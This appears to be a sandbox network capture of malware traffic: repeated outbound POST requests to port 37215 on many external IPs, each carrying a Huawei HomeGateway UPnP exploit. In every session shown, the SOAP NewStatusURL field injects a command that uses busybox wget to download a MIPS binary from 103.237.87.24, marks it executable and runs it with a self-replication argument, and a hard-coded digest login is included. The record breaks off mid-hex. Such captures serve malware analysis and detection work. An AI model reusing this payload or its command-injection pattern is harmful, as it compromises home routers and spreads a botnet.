                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  429192.168.2.1347886187.8.131.6337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111877918 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  430192.168.2.134420241.34.231.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111911058 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  431192.168.2.1355232195.89.143.16937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111912012 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  432192.168.2.1338008157.247.4.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.111927032 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  433192.168.2.1336840197.166.163.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113234997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  434192.168.2.1335488185.252.165.22337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113265991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  435192.168.2.1359636197.7.7.11537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113296986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  436192.168.2.135135241.246.190.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113296986 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  437192.168.2.1333756100.206.188.21937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113327026 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  438192.168.2.1339574157.116.91.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:56.113431931 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 